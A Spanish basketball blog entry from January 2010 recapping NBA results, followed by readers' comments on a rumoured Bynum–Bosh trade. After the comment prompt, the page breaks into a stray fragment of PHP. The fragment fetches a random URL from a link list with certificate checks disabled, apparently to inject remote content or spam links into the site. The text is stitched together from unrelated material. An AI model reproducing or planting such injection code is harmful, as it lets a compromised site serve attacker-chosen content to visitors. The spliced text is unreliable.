Minicrónica (09/01/2010)

10 de January de 2010 por TheDeerHunter

Pocas semanas antes del All-star, miramos la tabla clasificatoria y parece el mundo al revés. En el Oeste, los 5 primeros equipos han perdido sus últimos partidos. En el Este, este detalle les sucede a 3 de los 5 primeros, pero tanto Orlando como Miami también están mostrándose vulnerables las últimas semanas, con un 50% de victorias en los últimos 10 partidos.

Ayer fue Orlando quien salvó un “match ball” en el momento menos esperado, contra unos Hawks que venían de tumbar a Boston hace dos días y, como decíais ayer, estaban en condiciones de pasarlos por primera vez desde hace mucho tiempo. Joe Johnson 7 puntos, Bibby 5, Josh Smith 11 y Crawford 10, todos con porcentajes abominables. Lo peor es que eso es ahora mismo más habitual en ellos que lo de ganar a los Celtics. Por su parte los Magic a lo suyo, Howard el último mono en ataque pero con Barnes, Reddick, Williams y Ryan Anderson a buen nivel. Si lo pensamos bien son precísamente ellos los que mejor rendimiento están ofreciendo este curso. Si los buenos alcanzaran el nivel los demás equipos estarían en un gran problema… pero Stan no da con la tecla.

Con el víacrucis en la zona noble de la tabla seguimos. Los Mavs cuajaron uno de sus peores partidos de la temporada en casa contra Utah, en el regreso de Deron Williams. Maquillando el resultado sólo perdieron por menos de 10 puntos pero llegaron a hacerlo por 25. Los Jazz están con el agua al cuello por lo que la victoria y la vuelta de Deron les vino de perlas. No significó lo mismo para Denver la vuelta de Billups. Él se salió por todos lados, pero la defensa hizo aguas y, en un choque mal controlado, Tyreke Evans les birló la victoria, con “clutch” de genio incluido. Canasta para analizar con “Bruto” Martin encima suyo.

La emoción se desborda en la cola de las plazas de playoff. Kevin Durant respondió a la victoria de Utah masacrando a los Pacers, con megaduelo frente Danny Granger en su vuelta. Houston hizo sus deberes con los Knicks, pero a los Grizzlies no les sentó bien el “back to back” perdiendo en Charlotte, con Wallace en estado de gracia, birlándole un rebote al mismísimo Zach para ganar el partido.

Finalmente, los Sixers, con Brand respondiéndonos desde la distancia, trituraron a los inoperantes Pistons y los Bulls hicieron lo propio contra los Wolves.

Comenta

9 comentarios a esta entrada

  1. Love Denise dice:
    #1

    Acabo de leer un rumor de trade Bynum-Bosh, segun el NY Post,
    yo no me lo creo, pienso que a los Lakers no le interesaría, se quedaría sin un 5 (no termino de ver a Pau como 5). No estaría mal para lakers un traspaso Bosh por Odom, Morrison, y Vujacic, aunque no creo que Collangelo lo aceptara.

      Citar

  2. Lagarto dice:
    #2

    Siendo directivo de los Lakers, yo declararía a Odom intransferible. No sé lo que pensáis vosotros…

      Citar

  3. Txusma dice:
    #3

    Bosh y Gasol me parecen cortados un poco por el mismo patrón no sé como les iría juntos. De hecho, creo que de juntarse yo pondría a Bosh a jugar de 5. Lo q está claro es que el movimiento iria encaminado tanto para lograr el anillo este año como para ahorrarse dinerito al año siguiente pq, evidentemente, Bosh no renovaria con los amarillos.
    Por cierto, parece ser que Jamison quiere abandonar los wizards y suena para los Cavs. Sin duda es una muy buena pieza para cualquier equipo con aspiraciones.

      Citar

  4. Chris dice:
    #4

    A los Lakers más les valdría ir a por un base, podrían tantear en Miami, Chalmers podría funcionar bastante bien con el triangulo.

      Citar

  5. Vader dice:
    #5

    Los Cavs si que tendrian que dar todo lo que pudieran por Bosh para convencer a James de quedarse y ser aspirantes al anillo. Otros que tambien deberian tirar la casa por la ventana por Bosh son mis Knicks…

      Citar

  6. Txusma dice:
    #6

    Los Knicks tienen dinero para 2 mega cracks. Esta claro q el primer objetivo es Lebron James pero Bosh debe ser el segundo… Pq no verlos juntos con la camiseta de NY?

      Citar

  7. Viva_Dirk dice:
    #7

    Joer yo si fuese Kupchack ni me lo pensaba, decia que si antes de que se arrepientan, siempre que Bush este dispuesto a soltar la gallina en verano. Un equipo con Kobe-Bosh-Pau es una pasada, con Bosh para suceder a ambos en 2 o 3 años.

      Citar

  8. jas dice:
    #8

    Yo no lo veo… se sta poniendo en duda ultimamente la defensa d los lakers y precisamente bosh no es lo q necesitan en ese aspecto , a parte creo q cortaria un poco en ataque a Gasol colocandolo de 5 posicion q no es de su especial agrado, lo siento xo me kedo con bynum por lo menos defensivamente hablando xq anotadores a lakers le sobran con kobe, pau y si se dignan odom y artest… Stoy con Chris lo q necesitan como el comer es un buen base

      Citar

  9. Txusma dice:
    #9

    Tener 2 mega crack en un equipo vale… Pero tener 3? Te gastas el limite salarial en 3 tios y aún tienes por ahí a Odom y Artest. Demasiado dinero.
    Yo lo del base tampoco lo veo tan necesario. Con un base apañedete vamos listos y Brown y Farmar podrían cumplir la función.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>